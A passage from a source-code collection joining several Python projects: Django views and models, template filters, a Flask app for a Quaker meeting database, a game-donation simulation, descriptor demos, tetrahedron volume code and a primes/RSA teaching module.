'challenge':challenge,
'top_challenges': top_challenges,
'top_categories': top_categories,
'form':form,
'items':items
})
def categories_list(request):
categories = Category.objects.all().annotate(cnt=Count(
'challenges')).order_by('-cnt')
top_challenges = Challenge.objects.order_by("answers")[:3]
# top_categories = Challenge.objects.all().annotate(cnt=Count('categories'))
top_categories = Category.objects.all().annotate(cnt=Count('challenges')).order_by('-cnt')[:4]
return render(request, 'challenge/categories_list.html',
context={'categories': categories,
'top_challenges': top_challenges,
'top_categories': top_categories,
})
def categoryDetail(request, slug):
category = get_object_or_404(Category, slug__iexact=slug)
challenges = category.challenges.all()
    paginator = Paginator(challenges, 4)  # show 4 records per page
    page_number = request.GET.get('page')  # requested page number from the URL
    page = paginator.get_page(page_number)  # the records for that page
top_challenges = Challenge.objects.order_by("answers")[:3]
# top_categories = Challenge.objects.all().annotate(cnt=Count('categories'))
top_categories = Category.objects.all().annotate(
cnt=Count('challenges')).order_by('-cnt')[:4]
return render(request, 'challenge/categories_detail.html',
context={'top_challenges': top_challenges,
'top_categories': top_categories,
'page': page, 'paginator': paginator,
'category':category})
class CategoryDetail(ObjectDetailMixin, View):
model = Category
template = 'challenge/categories_detail.html'
class CategoryCreate(View):
def get(self, request):
form = CategoryForm()
return render(request, 'challenge/category_create.html', context={'form' : form})
def post(self,request):
bound_form = CategoryForm(request.POST)
if bound_form.is_valid():
new_category = bound_form.save()
return redirect(new_category)
return render(request, 'challenge/category_create.html', context={'form' : bound_form})
class ChallengeCreate(View):
def get(self, request):
form = ChallengeForm()
return render(request, 'challenge/challenge_create.html', context={'form' : form})
def post(self,request):
bound_form = ChallengeForm(request.POST)
if bound_form.is_valid():
new_challenge = bound_form.save(commit=False)
bound_form.instance.challenge_author = request.user
new_challenge.save()
return redirect(new_challenge)
return render(request, 'challenge/challenge_create.html', context={'form': bound_form})
class ChallengeUpdate(ObjectUpdateMixin, View):
model = Challenge
model_form = ChallengeForm
template = 'challenge/challenge_update_form.html'
class CategoryUpdate(ObjectUpdateMixin, View):
model = Category
model_form = CategoryForm
template = 'challenge/category_update_form.html'
class CategoryDelete(ObjectDeleteMixin, View):
model = Category
template = 'challenge/category_delete_form.html'
redirect_url = 'categories_list_url'
class ChallengeDelete(ObjectDeleteMixin, View):
model = Challenge
template = 'challenge/challenge_delete_form.html'
redirect_url = 'challenges_list_url'
# def get(self, request, slug):
# category = Category.objects.get(slug__iexact=slug)
# bound_form = CategoryForm(instance=category)
# return render(request, 'challenge/category_update_form.html', context={'form': bound_form, 'category' : category})
#
# def post(self, request, slug):
# category = Category.objects.get(slug__iexact=slug)
# bound_form = CategoryForm(request.POST,instance=category)
#
# if bound_form.is_valid():
# new_category = bound_form.save()
# return redirect(new_category)
# return render(request, 'challenge/category_update_form.html', context={'form': bound_form, 'category' : category})
```
#### File: CrowdEngine/CrowdEngine/views.py
```python
from django.shortcuts import render
from django.contrib.auth import get_user_model
from django.db.models import Count, Sum
from challenge.models import Challenge, Answer
User = get_user_model()
def redirect_crowd(request):
data = 123
challenge_count = Challenge.objects.all().count()
answers_count = Answer.objects.all().count()
#users_count = User.count()
# users_count = Challenge.objects.filter(au).count()
    # no trailing commas here: they previously turned these values into 1-tuples
    total_users = User.objects.aggregate(total_users=Count('id'))['total_users']
    challenge_users = Challenge.objects.aggregate(challenge_users=Count('challenge_author'))['challenge_users']
    answer_users = Answer.objects.aggregate(answer_users=Count('author'))['answer_users']
    prize_amount = Challenge.objects.aggregate(prize_amount=Sum('prize'))['prize_amount']
#
return render(request, 'main.html', context={'data': data, 'challenge_count' : challenge_count,
'answers_count' : answers_count, 'prize_amount':prize_amount,
'total_users': total_users, 'challenge_users' :challenge_users})
def about_us(request):
data = 123
return render(request, "about.html")
``` |
{
"source": "4dragunov/foodgram-project",
"score": 2
} |
#### File: recipes/templatetags/recipe_filters.py
```python
from django import template
from recipes.models import Favorite, Purchase, Subscription
register = template.Library()
@register.filter
def check_subscribe(author, user):
    '''Check whether the user is subscribed to the recipe's author'''
return Subscription.objects.filter(author_id=author.id,
user_id=user.id).exists()
@register.filter
def check_favorite(recipe, user):
    '''Check whether the recipe is in the user's favorites'''
return Favorite.objects.filter(recipe_id=recipe.id,
user_id=user.id).exists()
@register.filter
def check_purchase(recipe, user):
    '''Check whether the recipe is in the user's shopping list'''
return Purchase.objects.filter(recipe_id=recipe.id,
user_id=user.id).exists()
@register.filter(name='count_purchase')
def count_purchase(user):
    '''Count the recipes in the user's shopping list'''
return Purchase.objects.filter(user_id=user.id).count()
``` |
{
"source": "4dragunov/yamdb_final",
"score": 2
} |
#### File: yamdb_final/titles/models.py
```python
import datetime
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
class Category(models.Model):
name = models.CharField(
max_length=100,
verbose_name='Название категории',
)
slug = models.SlugField(
max_length=40,
unique=True,
)
def __str__(self):
return self.slug
class Meta:
ordering = (
'-name',
)
class Genre(models.Model):
name = models.CharField(
max_length=100,
verbose_name='Название жанра',
blank=False,
)
slug = models.SlugField(
max_length=40,
unique=True,
)
def __str__(self):
return self.slug
class Meta:
ordering = (
'-name',
)
class Title(models.Model):
name = models.CharField(
max_length=100,
verbose_name='Название произведения',
)
year = models.PositiveIntegerField(
default=datetime.datetime.now().year,
)
rating = models.PositiveSmallIntegerField(
validators=[
MaxValueValidator(10, 'Рейтинг не может быть выше 10'),
MinValueValidator(1),
],
null=True,
verbose_name="Рейтинг",
)
description = models.TextField(
max_length=1000,
verbose_name='Краткое описание',
)
genre = models.ManyToManyField(Genre)
category = models.ForeignKey(
Category,
null=True,
on_delete=models.SET_NULL,
related_name='titles',
verbose_name='Категория',
)
slug = models.SlugField(max_length=40)
class Meta:
ordering = (
'-rating',
)
``` |
{
"source": "4dsolutions/CSN",
"score": 4
} |
#### File: 4dsolutions/CSN/context1.py
```python
import sqlite3 as sql
class DB:
def __init__(self, the_db):
self.dbname = the_db
def __enter__(self):
"""
connect and get conn, curs
"""
self.conn = sql.connect(self.dbname)
self.curs = self.conn.cursor()
return self # this very object is db
def __exit__(self, *oops):
if self.conn:
self.conn.close()
if oops[0]: # exception occurred, else None
return False # not handling it...
return True # nothing to handle
# we'll want to import DB without triggering this test:
if __name__ == "__main__":
with DB("users.db") as db:
# connected...
db.curs.execute("SELECT * FROM Users ORDER BY username")
for row in db.curs.fetchall():
print(row)
# disconnected
```
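Usage note (not part of the repository): `DB.__exit__` only closes the connection, it never commits. A minimal write sketch, assuming the same `users.db` file and a `Users` table with a `username` column as in the `__main__` test above (any other NOT NULL columns would need values too):
```python
from context1 import DB

with DB("users.db") as db:
    # hypothetical insert; parameterized so no SQL string formatting is needed
    db.curs.execute("INSERT INTO Users (username) VALUES (?)", ("new_user",))
    db.conn.commit()  # __exit__ does not commit, so do it before leaving the block
```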
#### File: 4dsolutions/CSN/csn0.py
```python
import numpy as np
import pandas as pd
import json
import hashlib
import random
#%%
# Create data section
def shazam(the_str):
return hashlib.sha256(bytes(the_str, encoding='utf-8')).hexdigest()[:10]
def data():
global hall_of_fame
games = {"games":[
{"gcode": "ASM",
"name": "Awesome Journey",
"rating": "hard",
"audience": "teen",
"theme": "theme park"},
{"gcode": "TSH",
"name": "Treasure Hunt",
"rating": "hard",
"audience": "teen",
"theme": "VR"},
{"gcode": "PPS",
"name": "<NAME>",
"rating": "easy",
"audience": "all",
"theme": "epic"},
{"gcode": "WRR",
"name": "<NAME>",
"rating": "medium",
"audience": "adult",
"theme": "quiz"}
]}
# WARNING: destructive output, existing data will be overwritten
with open("games.json", 'w') as outfile:
json.dump(games, outfile)
players = {"players":[
{'pcode':shazam('Gus'),
'name': 'Gus',
'aliases': ['gustav', 'gus', 'the guster'],
'profile' : 'id-12345',
'account' : 200},
{'pcode':shazam('Keela'),
'name': 'Keela',
'aliases': ['keesha', 'pandabear', 'sloth'],
'profile' : 'id-54932',
'account' : 150},
{'pcode':shazam('Tor'),
'name': 'Tor',
'aliases': ['torror', 'torus', 'the tor'],
'profile' : 'id-94031',
'account' : 200},
{'pcode':shazam('Mitsu'),
'name': 'Mitsu',
'aliases': ['bishi', 'sitcom', 'vagrant'],
'profile' : 'id-88493',
'account' : 100}
]
}
# WARNING: destructive output, existing data will be overwritten
with open("players.json", 'w') as outfile:
json.dump(players, outfile)
causes = {"causes":[
{'zcode': 'STB',
'name':'Save the Bees'},
{'zcode': 'STW',
'name':'Save the Whales'},
{'zcode': 'STS',
'name':'Save the Seas'}
]}
# WARNING: destructive output, existing data will be overwritten
with open("causes.json", 'w') as outfile:
json.dump(causes, outfile)
# DataFrames
    # pd.np was removed from modern pandas; plain dtypes work the same
    hall_of_fame = pd.DataFrame({"pcode": pd.Series([], dtype=str),
                                 "gcode": pd.Series([], dtype=str),
                                 "zcode": pd.Series([], dtype=str),
                                 "amnt" : pd.Series([], dtype="int32"),
                                 "timestamp": pd.Series([], dtype='datetime64[ns]')})
#%%
def make_players():
    pcode = np.array([], dtype=str)    # np.unicode was removed in NumPy 1.20+
    name = np.array([], dtype=str)
    aliases = np.array([], dtype=str)
    profile = np.array([], dtype=str)
account = np.array([], dtype=np.int32)
with open('players.json') as target:
players = json.load(target)
for record in players['players']:
pcode = np.append(pcode, record['pcode'])
name = np.append(name, record['name'])
aliases = np.append(aliases, ", ".join(record['aliases']))
profile = np.append(profile, record['profile'])
account = np.append(account, record['account'])
return pd.DataFrame({'pcode' : pcode,
'name' : name,
'aliases': aliases,
'profile': profile,
'account': account})
def make_causes():
    zcode = np.array([], dtype=str)    # np.unicode was removed in NumPy 1.20+
    name = np.array([], dtype=str)
with open('causes.json') as target:
causes = json.load(target)
for record in causes['causes']:
zcode = np.append(zcode, record['zcode'])
name = np.append(name, record['name'])
return pd.DataFrame({'zcode': zcode,
'name': name})
def make_games():
    gcode = np.array([], dtype=str)    # np.unicode was removed in NumPy 1.20+
    name = np.array([], dtype=str)
    rating = np.array([], dtype=str)
    audience = np.array([], dtype=str)
    theme = np.array([], dtype=str)
with open('games.json') as target:
games = json.load(target)
for record in games['games']:
gcode = np.append(gcode, record['gcode'])
name = np.append(name, record['name'])
rating = np.append(rating, record['rating'])
audience= np.append(audience, record['audience'])
theme = np.append(theme, record['theme'])
#print(gcode)
#print(name)
#print(rating)
#print(audience)
#print(theme)
return pd.DataFrame({'gcode' : gcode,
'name' : name,
'rating' : rating,
'audience': audience,
'theme' : theme})
class Cause:
def __init__(self, **kwargs):
self.name = kwargs['name']
self.zcode = kwargs['zcode']
class Shop:
def __init__(self):
pass
def play(self, the_player, prompting=False, **kwargs):
the_game = None
print("\nGreetings {}".format(the_player.name))
if prompting:
self.print_games()
the_game = input("What game (enter code)...? ")
the_commit = int(input("Commit how much? (1-10) "))
else:
the_game = kwargs['the_game']
the_commit = kwargs['the_commit']
if not the_game:
print("No game selected")
return None
the_player.the_game = load_game(gcode=the_game)
the_player.commit = the_commit
print(the_player.the_game)
print("Thank you for playing {}".format(the_player.the_game.name))
the_player.account -= the_player.commit
# OK, we're playing now...
print("Action action, bling bling...")
win = random.randint(0,10)/100 * the_player.commit + \
the_player.commit
return win
def commit(self, the_player, prompting=False, **kwargs):
the_cause = None
if prompting:
self.print_causes()
the_cause = input("You win! Commit {} to... ?".
format(the_player.winnings))
else:
the_cause = kwargs['the_cause']
if not the_cause:
print("No cause selected")
return None
the_player.the_cause = load_cause(zcode = the_cause)
self.commit_winnings(the_player)
the_player.update_profile()
def commit_winnings(self, the_player):
print("{} gets {}".format(the_player.the_cause.name,
the_player.winnings))
def print_causes(self):
print(causes)
def print_games(self):
print(games)
class Game:
def __init__(self, **kwargs):
self.name = kwargs['name']
self.gcode = kwargs['gcode']
self.rating = kwargs['rating']
self.audience = kwargs['audience']
self.theme = kwargs['theme']
def __repr__(self):
return "Game: {}, code: {}".format(self.name, self.gcode)
class Player:
def __init__(self, pcode, nm, alias, profile, acct):
self.pcode = pcode # face recognition? Welcome Real Player One
self.name = nm
self.alias = alias
self.profile = profile
self.account = acct
# decided during play
self.commit = 0
self.winnings = 0
self.the_game = None
self.the_cause = None
def play(self, the_shop, prompting=False, **kwargs):
# play a game, donate winnings to the cause
self.winnings = the_shop.play(self, prompting, **kwargs)
the_shop.commit(self, prompting, **kwargs)
def update_profile(self):
"""
Columns: [pcode, gcode, zcode, amnt, timestamp]
"""
global hall_of_fame, new_rec
# the_player.update_profile(the_cause, the_game, amount, table=None)
print("{} gives {} to {}".format(self.name,
self.winnings,
self.the_cause.name))
        new_rec = pd.DataFrame(
            [[self.pcode, self.the_game.gcode, self.the_cause.zcode,
              self.winnings, pd.Timestamp.now()]],
            columns=['pcode', 'gcode', 'zcode', 'amnt', 'timestamp'])
        # DataFrame.append was removed in pandas 2.0; concat replaces it
        hall_of_fame = pd.concat([hall_of_fame, new_rec], ignore_index=True)
def load_player(name=None, pcode=None):
if name:
the_player = players.query('name == "{}"'.format(name))
if pcode:
the_player = players.query('pcode == "{}"'.format(pcode))
pcode = the_player.pcode.values[0]
name = the_player.name.values[0]
aliases = the_player.aliases.values[0]
profile = the_player.profile.values[0]
acct = the_player.account.values[0]
return Player(pcode, name, aliases, profile, acct)
def load_game(name=None, gcode=None):
if name:
the_game = games.query('name == "{}"'.format(name))
if gcode:
the_game = games.query('gcode == "{}"'.format(gcode))
gcode = the_game.gcode.values[0]
name = the_game.name.values[0]
rating = the_game.rating.values[0]
audience= the_game.audience.values[0]
theme = the_game.theme.values[0]
# all named arguments **kwargs
return Game(gcode = gcode,
name = name,
rating = rating,
audience = audience,
theme = theme)
def load_cause(zcode=None, name=None):
if name:
the_cause = causes.query('name == "{}"'.format(name))
if zcode:
the_cause = causes.query('zcode == "{}"'.format(zcode))
zcode = the_cause.zcode.values[0]
name = the_cause.name.values[0]
# all named arguments **kwargs
return Cause(zcode = zcode,
name = name)
def simulation1():
the_shop = Shop()
the_player = load_player(name = "Gus")
the_player.play(the_shop, prompting=True)
the_player = load_player(name = "Keela")
the_player.play(the_shop, prompting=True)
def simulation2():
the_shop = Shop()
the_player = load_player(name = "Gus")
the_player.play(the_shop, prompting=False,
the_game="ASM",
the_cause='STB',
the_commit = 5)
the_player = load_player(name = "Keela")
the_player.play(the_shop, prompting=False,
the_game = 'TSH',
the_cause = 'STW',
the_commit = 9)
if __name__ == "__main__":
data()
causes = make_causes()
players = make_players()
games = make_games()
# simulation1()
simulation2()
``` |
{
"source": "4dsolutions/NPYM",
"score": 2
} |
#### File: 4dsolutions/NPYM/npym_flask_app.py
```python
from flask import Flask, request, render_template
import sqlite3 as sql
import os
import time
import datetime
target_path = '/home/thekirbster/NPYM'
db_name = os.path.join(target_path, 'npym.db')
app = Flask(__name__)
@app.route("/")
def index():
user_agent = request.headers.get('User-Agent')
localtime = time.ctime(time.mktime(time.localtime()))
gmt_time = time.ctime(time.mktime(time.gmtime()))
return render_template('index.html', agent = user_agent,
local = localtime,
gmt = gmt_time)
@app.route("/slate/npym")
def npym_slate():
user_agent = request.headers.get('User-Agent')
localtime = time.ctime(time.mktime(time.localtime()))
gmt_time = time.ctime(time.mktime(time.gmtime()))
conn = sql.connect(db_name)
c = conn.cursor()
c.execute("""SELECT sl.group_name, sl.role_name, sl.friend_name,
ma.mtg_name, sl.start_date, sl.stop_date
FROM slates AS sl, member_attender AS ma
WHERE sl.friend_id = ma.friend_id
AND ({} BETWEEN sl.start_date AND sl.stop_date)
AND sl.mtg_code = 'npym'
ORDER BY sl.group_name""".format(datetime.date.today().toordinal()))
recs = list(c.fetchall())
conn.close()
def converter(unixepoch):
return datetime.date.fromordinal(unixepoch).isoformat()
return render_template('npym_slate.html', recs = recs, agent = user_agent,
local = localtime,
gmt = gmt_time, converter = converter)
@app.route('/slate/<mtg_code>')
def meeting_slate(mtg_code):
user_agent = request.headers.get('User-Agent')
localtime = time.ctime(time.mktime(time.localtime()))
gmt_time = time.ctime(time.mktime(time.gmtime()))
conn = sql.connect(db_name)
c = conn.cursor()
    # parameterized query: mtg_code comes from the URL, so don't format it in
    c.execute("""SELECT * FROM slates AS sl
              WHERE (? BETWEEN sl.start_date AND sl.stop_date)
              AND sl.mtg_code = ?
              ORDER BY sl.group_name""",
              (datetime.date.today().toordinal(), mtg_code))
recs = list(c.fetchall())
conn.close()
def converter(unixepoch):
return datetime.date.fromordinal(unixepoch).isoformat()
return render_template('slate.html', recs = recs, agent = user_agent,
local = localtime,
gmt = gmt_time, converter = converter)
@app.route('/friends/<mtg_code>')
def friends(mtg_code):
user_agent = request.headers.get('User-Agent')
localtime = time.ctime(time.mktime(time.localtime()))
gmt_time = time.ctime(time.mktime(time.gmtime()))
conn = sql.connect(db_name)
c = conn.cursor()
    # parameterized query: mtg_code comes from the URL, so don't format it in
    c.execute("""SELECT * FROM member_attender ma
              WHERE ma.mtg_code = ?
              ORDER BY ma.friend_name""", (mtg_code,))
today = datetime.date.today().toordinal()
    recs = [rec for rec in c.fetchall()
            if (rec[5] is None) or (today <= rec[5])]
conn.close()
return render_template('friends.html', recs = recs, agent = user_agent,
local = localtime,
gmt = gmt_time)
@app.route('/meetings/')
def meetings():
user_agent = request.headers.get('User-Agent')
localtime = time.ctime(time.mktime(time.localtime()))
gmt_time = time.ctime(time.mktime(time.gmtime()))
conn = sql.connect(db_name)
c = conn.cursor()
c.execute("""SELECT mtg_quarter, mtg_type, mtg_name, mtg_code FROM Meetings
ORDER BY mtg_quarter, mtg_type, mtg_name""")
recs = list(c.fetchall())
conn.close()
return render_template('meetings.html', recs = recs, agent = user_agent,
local = localtime,
gmt = gmt_time)
if __name__ == "__main__":
app.run(debug=True)
``` |
{
"source": "4dsolutions/Python5",
"score": 4
} |
#### File: 4dsolutions/Python5/dogma.py
```python
class Nondata:
def __init__(self, f):
if type(f) == str:
self.attr = f
else:
self.attr = f.__name__
def __get__(self, obj, cls):
print("in __get__", obj, cls)
return 42
class Data:
def __init__(self, f):
if type(f) == str:
self.attr = f
else:
self.attr = f.__name__
def __set__(self, obj, value):
print("in __set__", obj, value)
obj.__dict__[self.attr] = value
def __get__(self, obj, cls):
print("in __get__", obj, cls)
if self.attr in obj.__dict__:
return obj.__dict__[self.attr]
class Creature:
color = Data("color") # override
age = Nondata("age")
class Dog(Creature):
# color = "Green"
def __init__(self, nm):
self.name = nm
        self.color = "brown" # triggers Data.__set__
self.age = 10 # stores to self.__dict__
class Cat:
def __init__(self, nm):
self.name = nm
@Data
def color(self, color):
pass
@Nondata
def age(self, age):
self.age = age
```
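Usage note (not part of the repository): a hypothetical REPL walk-through of the data vs. non-data descriptor behavior `dogma.py` demonstrates (the `in __get__` / `in __set__` trace lines it prints are omitted for brevity):
```python
from dogma import Dog, Cat

d = Dog("Rex")     # Data.__set__ stores color; age goes straight into d.__dict__
print(d.color)     # the data descriptor wins over the instance dict -> "brown"
print(d.age)       # the instance dict shadows the *non-data* descriptor -> 10, not 42

c = Cat("Tabby")   # Cat.__init__ only sets name
print(c.age)       # no instance value, so Nondata.__get__ answers 42
c.color = "black"  # Data.__set__ stores into c.__dict__
print(c.color)     # read back through Data.__get__ -> "black"
```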
#### File: 4dsolutions/Python5/page_turner.py
```python
from math import sqrt
from tetravolume import Tetrahedron
sqrt2 = sqrt(2)
def coverA(n):
# Cover A to Tip when Tetrahedron volume = sqrt(n/9)
acute = sqrt(6-(2*(sqrt(9-n))))
return acute
def coverB(n):
# Cover B to Tip when Tetrahedron volume = sqrt(n/9)
obtuse = sqrt(6+(2*(sqrt(9-n))))
return obtuse
def chart():
"""
>>> chart()
Vol. IVM XYZ check
√(0/9) 0.000000 0.000000 0.000000
√(1/9) 0.353553 0.333333 0.333333
√(2/9) 0.500000 0.471405 0.471405
√(3/9) 0.612372 0.577350 0.577350
√(4/9) 0.707107 0.666667 0.666667
√(5/9) 0.790569 0.745356 0.745356
√(6/9) 0.866025 0.816497 0.816497
√(7/9) 0.935414 0.881917 0.881917
√(8/9) 1.000000 0.942809 0.942809
√(9/9) 1.060660 1.000000 1.000000
"""
print("Vol. IVM XYZ check")
for n in range(10):
# coverA or coverB will give the same answers as the
# complementary tetrahedrons have the same volume
tet = Tetrahedron(1, 1, 1, 1, 1, coverA(n)/2)
print("√({}/9) {:6f} {:6f} {:6f}".format(
n, tet.ivm_volume(), tet.xyz_volume(), sqrt(n/9)))
if __name__ == "__main__":
import doctest
doctest.testmod(verbose=True)
```
#### File: 4dsolutions/Python5/primes.py
```python
"""
primes.py -- Oregon Curriculum Network (OCN)
Feb 1, 2001 changed global var primes to _primes, added relative primes test
Dec 17, 2000 appended probable prime generating methods, plus invmod
Dec 16, 2000 revised to use pow(), removed methods not in text, added sieve()
Dec 12, 2000 small improvements to erastosthenes()
Dec 10, 2000 added Euler test
Oct 3, 2000 modified fermat test
Jun 5, 2000 rewrite of erastosthenes method
May 19, 2000 added more documentation
May 18, 2000 substituted Euclid's algorithm for gcd
Apr 7, 2000 changed name of union function to 'cover' for consistency
Apr 6, 2000 added union, intersection -- changed code of lcm, gcd
Apr 5, 2000 added euler, base, expo functions (renamed old euler to phi)
Mar 31, 2000 added sieve, renaming/modifying divtrial
Mar 30, 2000 added LCM, GCD, euler, fermat
Mar 28, 2000 added lcm
Feb 18, 2000 improved efficiency of isprime(), made getfactors recursive
Apr 28, 2013 changed LCM to not use reduce
Sep 4, 2017 convert to Python 3.6, move to Github
"""
import time, random, operator
from functools import reduce
_primes = [2] # global list of primes
def iseven(n):
"""Return true if n is even."""
return n%2==0
def isodd(n):
"""Return true if n is odd."""
return not iseven(n)
def get2max(maxnb):
"""Return list of primes up to maxnb."""
nbprimes = 0
if maxnb < 2: return []
# start with highest prime so far
i = _primes[-1]
# and add...
i = i + 1 + isodd(i)*1 # next odd number
if i <= maxnb: # if more prime checking needed...
while i<=maxnb:
if divtrial(i): _primes.append(i) # append to list if verdict true
i=i+2 # next odd number
nbprimes = len(_primes)
else:
for i in _primes: # return primes =< maxnb, even if more on file
if i<=maxnb: nbprimes = nbprimes + 1
else: break # quit testing once maxnb exceeded
return _primes[:nbprimes]
def get2nb(nbprimes):
"""Return list of primes with nbprimes members."""
if nbprimes>len(_primes):
# start with highest prime so far
i = _primes[-1]
# and add...
i = i + 1 + isodd(i)*1
while len(_primes)<nbprimes:
if divtrial(i): _primes.append(i)
i=i+2
return _primes[:nbprimes]
def isprime(n):
"""
Divide by primes until n proves composite or prime.
Brute force algorithm, will wimp out for humongous n
return 0 if n is divisible
return 1 if n is prime
"""
rtnval = 1
if n == 2: return 1
if n < 2 or iseven(n): return 0
maxnb = n ** 0.5 # 2nd root of n
# if n < largest prime on file, check for n in list
if n <= _primes[-1]: rtnval = (n in _primes)
# if primes up to root(n) on file, run divtrial (a prime test)
elif maxnb <= _primes[-1]: rtnval = divtrial(n)
else:
rtnval = divtrial(n) # check divisibility by primes so far
if rtnval==1: # now, if still tentatively prime...
# start with highest prime so far
i = _primes[-1]
# and add...
i = i + 1 + isodd(i)*1 # next odd number
while i <= maxnb:
if divtrial(i): # test of primehood
_primes.append(i) # append to list if prime
if not n%i: # if n divisible by latest prime
rtnval = 0 # then we're done
break
i=i+2 # next odd number
return rtnval
def iscomposite(n):
"""
Return true if n is composite.
Uses isprime"""
return not isprime(n)
def divtrial(n):
"""
Trial by division check whether a number is prime."""
verdict = 1 # default is "yes, add to list"
cutoff = n**0.5 # 2nd root of n
for i in _primes:
if not n%i: # if no remainder
verdict = 0 # then we _don't_ want to add
break
if i >= cutoff: # stop trying to divide by
break # lower primes when p**2 > n
return verdict
def erastosthenes(n):
    """
    Suggestions from <NAME>, <NAME> and <NAME>"""
    sieve = [0, 0, 1] + [1, 0] * (n//2)  # [0 0 1 1 0 1 0...]
    prime = 3                            # initial odd prime
    while prime**2 <= n:
        for i in range(prime**2, n+1, prime*2):
            sieve[i] = 0                 # step through sieve by prime*2
        prime += 1 + sieve[prime+1:].index(1)  # get next prime
    # keep the integers whose sieve slot is still 1
    return [i for i in range(n+1) if sieve[i]]
def sieve(n):
    """
    In-place sieving of odd numbers, adapted from code
    by <NAME>
    """
    candidates = list(range(3, n+1, 2))    # start with odds
    for p in candidates:
        if p:                              # skip zeros
            if p*p > n: break              # done
            for q in range(p*p, n+1, 2*p): # sieving
                candidates[(q-3)//2] = 0
    return [2] + [p for p in candidates if p]  # [2] + remaining nonzeros
def base(n,b):
"""
Accepts n in base 10, returns list corresponding to n base b."""
output = []
while n>=1:
n,r = divmod(n,b) # returns quotient, remainder
output.append(r)
output.reverse()
return output
def fermat(n,b=2):
"""Test for primality based on Fermat's Little Theorem.
returns 0 (condition false) if n is composite, -1 if
base is not relatively prime
"""
if gcd(n,b)>1: return -1
else: return pow(b,n-1,n)==1
def jacobi(a,n):
"""Return jacobi number.
source: http://www.utm.edu/research/primes/glossary/JacobiSymbol.html"""
j = 1
while not a == 0:
while iseven(a):
a = a/2
if (n%8 == 3 or n%8 == 5): j = -j
x=a; a=n; n=x # exchange places
if (a%4 == 3 and n%4 == 3): j = -j
a = a%n
if n == 1: return j
else: return 0
def euler(n,b=2):
"""Euler probable prime if (b**(n-1)/2)%n = jacobi(a,n).
(stronger than simple fermat test)"""
    term = pow(b, (n-1)//2, n)  # 3-arg pow needs an integer exponent
jac = jacobi(b,n)
if jac == -1: return term == n-1
else: return term == jac
def getfactors(n):
"""Return list containing prime factors of a number."""
if isprime(n) or n==1: return [n]
else:
for i in _primes:
if not n%i: # if goes evenly
n = n//i
return [i] + getfactors(n)
def gcd(a,b):
"""Return greatest common divisor using Euclid's Algorithm."""
while b:
a, b = b, a % b
return a
def lcm(a,b):
"""
Return lowest common multiple."""
    return (a*b)//gcd(a,b)
def GCD(terms):
"Return gcd of a list of numbers."
return reduce(lambda a,b: gcd(a,b), terms)
def LCM(terms):
"Return lcm of a list of numbers."
result = 1
for t in terms:
result = lcm(result, t)
return result
def phi(n):
"""Return number of integers < n relatively prime to n."""
product = n
used = []
for i in getfactors(n):
if i not in used: # use only unique prime factors
used.append(i)
product = product * (1 - 1.0/i)
return int(product)
def relprimes(n,b=1):
"""
List the remainders after dividing n by each
n-relative prime * some relative prime b
"""
relprimes = []
for i in range(1,n):
if gcd(i,n)==1: relprimes.append(i)
print(" n-rp's: %s" % (relprimes))
    relprimes = [b * rp for rp in relprimes]
    newremainders = [rp % n for rp in relprimes]
    print("b * n-rp's mod n: %s" % newremainders)
def testeuler(a,n):
"""Test Euler's Theorem"""
if gcd(a,n)>1:
print("(a,n) not relative primes")
else:
print("Result: %s" % pow(a,phi(n),n))
def goldbach(n):
"""Return pair of primes such that p1 + p2 = n."""
rtnval = []
_primes = get2max(n)
if isodd(n) and n >= 5:
rtnval = [3] # 3 is a term
n = n-3 # 3 + goldbach(lower even)
if n==2: rtnval.append(2) # catch 5
else:
if n<=3: rtnval = [0,0] # quit if n too small
for i in range(len(_primes)):
# quit if we've found the answer
if len(rtnval) >= 2: break
# work back from highest prime < n
testprime = _primes[-(i+1)]
for j in _primes:
# j works from start of list
if j + testprime == n:
rtnval.append(j)
rtnval.append(testprime) # answer!
break
if j + testprime > n:
break # ready for next testprime
return rtnval
"""
The functions below have to do with encryption, and RSA in
particular, which uses large probable _primes. More discussion
at the Oregon Curriculum Network website is at
http://www.inetarena.com/~pdx4d/ocn/clubhouse.html
"""
def bighex(n):
hexdigits = list('0123456789ABCDEF')
hexstring = random.choice(hexdigits[1:])
for i in range(n):
hexstring += random.choice(hexdigits)
return eval('0x'+hexstring)
def bigdec(n):
decdigits = list('0123456789')
decstring = random.choice(decdigits[1:])
for i in range(n):
decstring += random.choice(decdigits)
return decstring
def bigppr(digits=100):
"""
Randomly generate a probable prime with a given
number of decimal digits
"""
    start = time.perf_counter()  # time.clock() was removed in Python 3.8
print("Working...")
candidate = int(bigdec(digits)) # or use bighex
if candidate & 1==0:
candidate += 1
prob = 0
while True:
prob=pptest(candidate)
if prob>0: break
else: candidate += 2
print("Percent chance of being prime: %r" % (prob*100))
print("Elapsed time: %s seconds" % (time.clock()-start))
return candidate
def pptest(n):
"""
Simple implementation of Miller-Rabin test for
determining probable primehood.
"""
bases = [random.randrange(2,50000) for x in range(90)]
# if any of the primes is a factor, we're done
if n<=1: return 0
for b in bases:
if n%b==0: return 0
tests,s = 0, 0
m = n-1
# turning (n-1) into (2**s) * m
while not m&1: # while m is even
m >>= 1
s += 1
for b in bases:
tests += 1
isprob = algP(m,s,b,n)
if not isprob: break
if isprob: return (1-(1./(4**tests)))
else: return 0
def algP(m,s,b,n):
"""
based on Algorithm P in Donald Knuth's 'Art of
Computer Programming' v.2 pg. 395
"""
result = 0
y = pow(b,m,n)
for j in range(s):
if (y==1 and j==0) or (y==n-1):
result = 1
break
y = pow(y,2,n)
return result
def invmod(a,b):
"""
Return modular inverse using a version Euclid's Algorithm
Code by <NAME> in Python Journal:
http://www.pythonjournal.com/volume1/issue1/art-algorithms/
-- in turn also based on Knuth, vol 2.
"""
a1, a2, a3 = 1, 0, a
b1, b2, b3 = 0, 1, b
while b3 != 0:
        # Integer (floor) division keeps everything in the integers.
        q = a3 // b3
t = a1 - b1*q, a2 - b2*q, a3 - b3*q
a1, a2, a3 = b1, b2, b3
b1, b2, b3 = t
while a2<0: a2 = a2 + a
return a2
```
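Usage note (not part of the repository): the RSA-oriented helpers compose into a toy round trip. A minimal sketch with the small textbook primes 61 and 53 (numbers chosen here, not taken from the module); note that `invmod(a, b)` returns the inverse of `b` modulo `a`:
```python
from primes import invmod

p, q = 61, 53                        # toy primes; real keys would come from bigppr()
n, phi_n = p * q, (p - 1) * (q - 1)  # 3233, 3120
e = 17                               # public exponent, coprime to phi_n
d = invmod(phi_n, e)                 # 2753, since invmod(a, b) gives b**-1 mod a
c = pow(65, e, n)                    # encrypt the "message" 65
assert pow(c, d, n) == 65            # decrypting recovers it
```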
#### File: 4dsolutions/Python5/tetravolume.py
